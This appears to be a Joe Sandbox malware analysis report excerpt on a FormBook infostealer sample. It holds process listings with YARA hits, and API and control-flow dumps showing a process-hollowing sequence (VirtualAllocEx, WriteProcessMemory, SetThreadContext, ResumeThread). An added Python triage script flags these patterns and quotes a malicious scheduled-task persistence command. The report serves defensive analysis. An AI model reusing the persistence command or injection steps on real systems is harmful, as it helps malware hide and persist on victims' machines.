                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:22:16:18
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x9a0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:23:58:30
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe"
                                                            Imagebase:0x810000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false

                                                            Target ID:23
                                                            Start time:23:58:32
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\systray.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\systray.exe"
                                                            Imagebase:0xcc0000
                                                            File size:9'728 bytes
                                                            MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false

                                                            Target ID:24
                                                            Start time:23:58:44
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe"
                                                            Imagebase:0x810000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Has exited:false

                                                            Target ID:26
                                                            Start time:23:58:57
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff722870000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

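The process table above is a list of facts, not a detection; the added example below (written for this page, not code from Joe Sandbox) shows how a triage script would read those entries and flag the patterns that matter here: schtasks /Create importing its task XML from %LOCALAPPDATA%\Temp, a running copy under AppData\Roaming whose MD5 equals the submitted sample, a .NET framework utility started with nothing but its own path on the command line, and an image in a long random letters-only directory under Program Files (x86). The sample input is constructed from the report's own entries; the extra .NET host names beyond RegSvcs.exe, the 32-character directory-name threshold and the "Key:Value" parsing are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed sample input: five entries copied in shape and values from the
# process table above (Target IDs 15, 17, 19, 22, 26), trimmed to the fields the
# checks use. Added example data, not Joe Sandbox output.
SAMPLE_REPORT = r"""
Target ID:15
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
MD5 hash:9D352BC46709F0CB5EC974633A0C3C94

Target ID:17
Path:C:\Users\user\AppData\Roaming\uEugNEto.exe
Commandline:C:\Users\user\AppData\Roaming\uEugNEto.exe
MD5 hash:8D46BAF183C4F911EA9BF65C8797D8EA

Target ID:19
Path:C:\Windows\SysWOW64\schtasks.exe
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"
MD5 hash:48C2FE20575769DE916F48EF0676A965

Target ID:22
Path:C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
Commandline:"C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe"
MD5 hash:32B8AD6ECA9094891E792631BAEA9717

Target ID:26
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
"""

# MD5 of the submitted sample, as stated in the report's General Information.
SAMPLE_MD5 = "8D46BAF183C4F911EA9BF65C8797D8EA"

# .NET utilities often launched with an empty command line as injection hosts.
# Only RegSvcs.exe occurs in this report; the rest are an assumption added here.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


def parse_processes(text: str) -> List[Dict[str, str]]:
    """Turn the report's blank-line-separated "Key:Value" blocks into dicts."""
    procs: List[Dict[str, str]] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields: Dict[str, str] = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")  # split on the first colon only
            fields[key.strip()] = value.strip()
        if "Target ID" in fields:
            procs.append(fields)
    return procs


def is_temp_task_creation(proc: Dict[str, str]) -> bool:
    """schtasks /Create that imports its task definition from a temp-file XML."""
    cmd = proc.get("Commandline", "").lower()
    return (proc["Path"].lower().endswith("\\schtasks.exe")
            and "/create" in cmd and "/xml" in cmd
            and "\\appdata\\local\\temp\\" in cmd)


def is_self_copy(proc: Dict[str, str], sample_md5: str) -> bool:
    """A running image under AppData/Roaming that is byte-identical to the sample."""
    return (proc.get("MD5 hash", "").upper() == sample_md5.upper()
            and "\\appdata\\roaming\\" in proc["Path"].lower())


def is_bare_dotnet_host(proc: Dict[str, str]) -> bool:
    """A .NET utility whose command line is nothing but its own (quoted) path."""
    path = proc["Path"]
    name = path.rsplit("\\", 1)[-1].lower()
    cmd = proc.get("Commandline", "").strip().strip('"')
    return name in DOTNET_HOSTS and cmd.lower() == path.lower()


def is_random_program_files_dir(proc: Dict[str, str]) -> bool:
    """Image in a letters-only directory of 32+ chars directly under Program Files (x86).
    The 32-character threshold is a heuristic chosen for this example."""
    pattern = r"^[A-Za-z]:\\Program Files \(x86\)\\[A-Za-z]{32,}\\"
    return re.match(pattern, proc["Path"]) is not None


def triage(text: str, sample_md5: str = SAMPLE_MD5) -> Dict[str, List[str]]:
    """Map each finding label to the Target IDs whose entry trips that check."""
    checks = [
        ("schtasks_xml_from_temp", is_temp_task_creation),
        ("sample_copied_to_roaming", lambda p: is_self_copy(p, sample_md5)),
        ("bare_dotnet_host", is_bare_dotnet_host),
        ("random_dir_in_program_files_x86", is_random_program_files_dir),
    ]
    findings: Dict[str, List[str]] = {}
    for proc in parse_processes(text):
        for label, check in checks:
            if check(proc):
                findings.setdefault(label, []).append(proc["Target ID"])
    return findings


if __name__ == "__main__":
    for label, targets in triage(SAMPLE_REPORT).items():
        print(f"{label}: Target ID(s) {', '.join(targets)}")
```

Run against the constructed entries, the script attributes each finding to exactly one Target ID (19, 17, 15 and 22 respectively) and leaves the Firefox entry (26) unflagged; the same checks can be pointed at a full process table by feeding it the report text instead of the embedded sample.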

                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:186
                                                              Total number of Limit Nodes:18
                                                              execution_graph (rendered here as the API-bearing nodes only; the flattened node-ID/edge dump was an extraction artifact of the interactive graph)
                                                              • 01294668 chain: 0129449c, 01295918 CreateActCtxA
                                                              • 0129d5c8 chain: 0129d60e GetCurrentProcess, 0129d660 GetCurrentThread, 0129d69d GetCurrentProcess, 0129d6fb GetCurrentThreadId
                                                              • 0129ae30 chain: 0129b160 GetModuleHandleW
                                                              • 0129d810 DuplicateHandle
                                                              • 07340de0 chain: 073416ff GetCurrentThreadId
                                                              • 07341fd8 and 0734b408 chains: 0734204e, 07342058, 07342370, 07342380, 07342435, 07342c00, 07342c10, 07343068, 07343078, 073430a8, 073430b8, 07343129, 07343138, 073412e8, 07345d10, 07345d20, 07345d58, 073447bc, 0734b600, 0734b610, 0734b790, 0734bd63, 0734bd70, 0734f5e0, 0734f608, 0734fbf2, 0734fc00 DrawTextExW
                                                              • 0736d380 chain: 0736d3c0 ResumeThread
                                                              • 0736d430 chain: 0736d475 Wow64SetThreadContext
                                                              • 0736d940 chain: 0736d980 VirtualAllocEx
                                                              • 0736da00 chain: 0736da48 WriteProcessMemory
                                                              • 0736def0 chain: 0736df3b ReadProcessMemory
                                                              • 0736e088 chain: 0736e111 CreateProcessA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8de3501f761ae07cc585eb2faac0d29a043fd3389892748a9f4d0837f2340c3
                                                              • Instruction ID: 8547a37df48072439ad20ca68ba1f35acb40ee146d4c7ad72ce1976731a100e3
                                                              • Opcode Fuzzy Hash: d8de3501f761ae07cc585eb2faac0d29a043fd3389892748a9f4d0837f2340c3
                                                              • Instruction Fuzzy Hash: BB21E8B1D146599BEB18CF97C9153DEFBF7AF89300F04C06AD409B6268DB7409468F54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22eaa3ca193bc39f289525c705ddf4b853af720c6591f0a0f89348c03771c591
                                                              • Instruction ID: fdb58849d06698aec35cdffb9d095157b6389d0b88320f20342dd1172c8bb32e
                                                              • Opcode Fuzzy Hash: 22eaa3ca193bc39f289525c705ddf4b853af720c6591f0a0f89348c03771c591
                                                              • Instruction Fuzzy Hash: 9F21E7B1D006199BEB18CF9BC8047DEFAF7BFC9300F14C06AD40966258DBB509468F90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 342 129d5b9-129d657 GetCurrentProcess 346 129d659-129d65f 342->346 347 129d660-129d694 GetCurrentThread 342->347 346->347 348 129d69d-129d6d1 GetCurrentProcess 347->348 349 129d696-129d69c 347->349 350 129d6da-129d6f5 call 129d797 348->350 351 129d6d3-129d6d9 348->351 349->348 355 129d6fb-129d72a GetCurrentThreadId 350->355 351->350 356 129d72c-129d732 355->356 357 129d733-129d795 355->357 356->357
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D646
                                                              • GetCurrentThread.KERNEL32 ref: 0129D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0129D719
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 3eb5940465d681321b39f25afd4e4aa844b5f030d01ea3cc38b77dde76c7a504
                                                              • Instruction ID: bf8ab2d1bb575238b56b16f076c7323aaac616fb26c91334fadac99738033066
                                                              • Opcode Fuzzy Hash: 3eb5940465d681321b39f25afd4e4aa844b5f030d01ea3cc38b77dde76c7a504
                                                              • Instruction Fuzzy Hash: BD5156B09007098FEB14DFAAE548BAEBBF1FF88314F208459D419AB290DB346945CF65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 364 129d5c8-129d657 GetCurrentProcess 368 129d659-129d65f 364->368 369 129d660-129d694 GetCurrentThread 364->369 368->369 370 129d69d-129d6d1 GetCurrentProcess 369->370 371 129d696-129d69c 369->371 372 129d6da-129d6f5 call 129d797 370->372 373 129d6d3-129d6d9 370->373 371->370 377 129d6fb-129d72a GetCurrentThreadId 372->377 373->372 378 129d72c-129d732 377->378 379 129d733-129d795 377->379 378->379
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D646
                                                              • GetCurrentThread.KERNEL32 ref: 0129D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0129D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0129D719
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 4566a9bd9fc9ae29adf8ede3d9ebb6b2bf93c485b070e2ae8785d63f108ab7d6
                                                              • Instruction ID: 47a3b79cde21816b221b7b627a8cdb9080e5caa8d7a181d0a38f5537f63b8865
                                                              • Opcode Fuzzy Hash: 4566a9bd9fc9ae29adf8ede3d9ebb6b2bf93c485b070e2ae8785d63f108ab7d6
                                                              • Instruction Fuzzy Hash: 6E5146B09007098FEB18DFAAD548B9EBBF1FF88314F208419D519AB390DB746945CF65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 616 736e07c-736e11d 618 736e156-736e176 616->618 619 736e11f-736e129 616->619 626 736e1af-736e1de 618->626 627 736e178-736e182 618->627 619->618 620 736e12b-736e12d 619->620 621 736e150-736e153 620->621 622 736e12f-736e139 620->622 621->618 624 736e13d-736e14c 622->624 625 736e13b 622->625 624->624 628 736e14e 624->628 625->624 635 736e217-736e2d1 CreateProcessA 626->635 636 736e1e0-736e1ea 626->636 627->626 629 736e184-736e186 627->629 628->621 631 736e188-736e192 629->631 632 736e1a9-736e1ac 629->632 633 736e196-736e1a5 631->633 634 736e194 631->634 632->626 633->633 637 736e1a7 633->637 634->633 647 736e2d3-736e2d9 635->647 648 736e2da-736e360 635->648 636->635 638 736e1ec-736e1ee 636->638 637->632 640 736e1f0-736e1fa 638->640 641 736e211-736e214 638->641 642 736e1fe-736e20d 640->642 643 736e1fc 640->643 641->635 642->642 645 736e20f 642->645 643->642 645->641 647->648 658 736e362-736e366 648->658 659 736e370-736e374 648->659 658->659 662 736e368 658->662 660 736e376-736e37a 659->660 661 736e384-736e388 659->661 660->661 663 736e37c 660->663 664 736e38a-736e38e 661->664 665 736e398-736e39c 661->665 662->659 663->661 664->665 666 736e390 664->666 667 736e3ae-736e3b5 665->667 668 736e39e-736e3a4 665->668 666->665 669 736e3b7-736e3c6 667->669 670 736e3cc 667->670 668->667 669->670 671 736e3cd 670->671 671->671
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0736E2BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: b19011487f367c7e1079df8da93c1a20246368feb0c4c9500e47002f71f5fb7c
                                                              • Instruction ID: d967db965b6b6e9808b45829e485fb83d5aaf296ea8fcd09521766a0e536eec6
                                                              • Opcode Fuzzy Hash: b19011487f367c7e1079df8da93c1a20246368feb0c4c9500e47002f71f5fb7c
                                                              • Instruction Fuzzy Hash: 80A17DB5D4031ADFEB20DF68C844BEDBBB2BF48310F1481A9D819A7244DB759985CF91

Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed): basic blocks 736e088-736e3cd, CreateProcessA called in block 736e217-736e2d1
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0736E2BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: be5f289da23c246f8524be4fe5f4dff4d722ff45fa9a27e319dd492381ebc374
                                                              • Instruction ID: f7d169f266eb2bfc77ec753282bf9304bad140985b7ead8790d2ae2f97423bde
                                                              • Opcode Fuzzy Hash: be5f289da23c246f8524be4fe5f4dff4d722ff45fa9a27e319dd492381ebc374
                                                              • Instruction Fuzzy Hash: A1917CB5D4031ACFEB20CF68C844BEDBBB2BF48310F1481A9E819A7244DB759985CF91

Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed): basic blocks 129af19-129b1a8, GetModuleHandleW called in block 129b160-129b18b, internal calls to 12998a0, 129b1b0, 129b1c0, 129a270, 129a280, 129a290, 129a2a0
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0129B17E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: be5c26d523d38c8b1152acd5c2836faadf40665b5cd8dcaff9cfbc273470e849
                                                              • Instruction ID: e3d95f6301d01927a4af097fd48a12564763100ea995912a6834984ce8d44e2f
                                                              • Opcode Fuzzy Hash: be5c26d523d38c8b1152acd5c2836faadf40665b5cd8dcaff9cfbc273470e849
                                                              • Instruction Fuzzy Hash: 0B814870A10B468FDB24DF2DD4447AABBF1BF88304F00892DD19ADBA50D775E949CB90

Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed): basic blocks 129590c-1295a61, CreateActCtxA called in block 129590c-12959d9
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 012959C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: c8daabd1fe6663fe7d7e8c661c3e19d930485cd3062c0ac6f53f6124e7ee2319
                                                              • Instruction ID: 5274279160982dc7d4ea26597ee075104910b6dd1dce587efd28b10ef5c811cd
                                                              • Opcode Fuzzy Hash: c8daabd1fe6663fe7d7e8c661c3e19d930485cd3062c0ac6f53f6124e7ee2319
                                                              • Instruction Fuzzy Hash: A141DF71D10719CFEB24CFAAC884B9DBBF1BF48314F20816AD408AB255DB755986CF50

Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed): basic blocks 129449c-1295a61, CreateActCtxA called in block 129449c-12959d9
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 012959C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 7fb28d76e364dda039d51669e509f1f7b314b6ca76d7390dabc9b600f2e3ec14
                                                              • Instruction ID: a67bd8df579728383e6d6e0206a0abc0fd70d71f02f525e2616508092b6b8b62
                                                              • Opcode Fuzzy Hash: 7fb28d76e364dda039d51669e509f1f7b314b6ca76d7390dabc9b600f2e3ec14
                                                              • Instruction Fuzzy Hash: 5F41EE70D10719CBEF24DFAAC884B8DBBF1BF48714F20806AD508AB251DB756986CF90
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0736DA90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 478eb539f5e092287d97936337deb7f36b85f2e1dc2710d3612a8c8cf795f8d7
                                                              • Instruction ID: d6695ba264fa7ce256694b3b6c30b92b62fd373b814218f4237804034e8bd492
                                                              • Opcode Fuzzy Hash: 478eb539f5e092287d97936337deb7f36b85f2e1dc2710d3612a8c8cf795f8d7
                                                              • Instruction Fuzzy Hash: 222148B5D003499FDB10CFA9C845BDEBBF4FB48310F10842AE958A7240D7759941CBA0
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07345D3D,?,?), ref: 07345DEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379728429.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7340000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 262ec2dbbba91d7a02dda1b6fa69c27ff306185c87f2cfa4856b6f5d42c79395
                                                              • Instruction ID: 848e68a58c32e236f48963ec0c17798de2ca4271ce81e0804d73b345f150c367
                                                              • Opcode Fuzzy Hash: 262ec2dbbba91d7a02dda1b6fa69c27ff306185c87f2cfa4856b6f5d42c79395
                                                              • Instruction Fuzzy Hash: 9731E2B6D003499FDB14CF9AD884A9EBBF5FF48310F14842AE919A7210D775A954CFA0
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07345D3D,?,?), ref: 07345DEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379728429.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7340000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: fe0aecff65a8092578839b27559e71f55d52dd3f0b80625220fe0216bbef3560
                                                              • Instruction ID: 9041d75d30ac117c517db6a2ab697838e148cf301b1d5e3ed2ea87ed9d139545
                                                              • Opcode Fuzzy Hash: fe0aecff65a8092578839b27559e71f55d52dd3f0b80625220fe0216bbef3560
                                                              • Instruction Fuzzy Hash: E631E2B6D0020A9FDB14CF99D884ADEBBF5BF48320F14842AE819A7210D775A950CFA0
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0736DA90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: b8ef0d12c1616828b7ae945bb6c55c29ef83212910da1e4f2cee178c42d5dc48
                                                              • Instruction ID: cb7881907f321c7682a2eb9dd19938eca30a50e2706b2ee6855999975dc5c36c
                                                              • Opcode Fuzzy Hash: b8ef0d12c1616828b7ae945bb6c55c29ef83212910da1e4f2cee178c42d5dc48
                                                              • Instruction Fuzzy Hash: A92135B5D003499FDB10DFAAC885BDEBBF5FB48310F50842AE918A7340D7799940CBA4
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0736D4AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 402ed574a789ff9202fc34228342125c49937d1d0af1e48851b338b05f15e498
                                                              • Instruction ID: ea20a6cc31d08357b0b1432d075fe2b7fabc5083a1c42c74153966cc6a3af343
                                                              • Opcode Fuzzy Hash: 402ed574a789ff9202fc34228342125c49937d1d0af1e48851b338b05f15e498
                                                              • Instruction Fuzzy Hash: 09214AB1D003099FDB10DFAAC4857EEBBF4EB48314F10842AD419A7240CB78A945CBA4
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0129D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: f6219a316224655c832c86d4df487ecf901df72b60f31960b0169a0b3ce89980
                                                              • Instruction ID: c9d4d9fa5355f4371cc82d39ffd3eca1484e4c1b8c333a7a1f9e86ae490173ff
                                                              • Opcode Fuzzy Hash: f6219a316224655c832c86d4df487ecf901df72b60f31960b0169a0b3ce89980
                                                              • Instruction Fuzzy Hash: 0B21E6B5D003499FDB10CF9AD885AEEBBF4FB48320F14841AE958A7350D379A945CFA1
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0736DF70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 8a2cfab7f030e57555dd271b3ded0038c86714e8bf88039814b974fe687a6699
                                                              • Instruction ID: bf228e103778abf3fceec801de328adb6fd9c52c0dfc01d8b3dcc3f5f079663f
                                                              • Opcode Fuzzy Hash: 8a2cfab7f030e57555dd271b3ded0038c86714e8bf88039814b974fe687a6699
                                                              • Instruction Fuzzy Hash: 122139B5D003499FDB10DFAAC885BEEBBF5FF48310F50842AE918A7240C7759941CBA4
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0736D4AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 249a268d241e04f8bf1d06f6666d58e4643076baadaf7a08b5086d982f14fa83
                                                              • Instruction ID: 0d54819bdf96569e26a3e4228d1cf3c673e7e792ba1221a6cec452f01164eaa0
                                                              • Opcode Fuzzy Hash: 249a268d241e04f8bf1d06f6666d58e4643076baadaf7a08b5086d982f14fa83
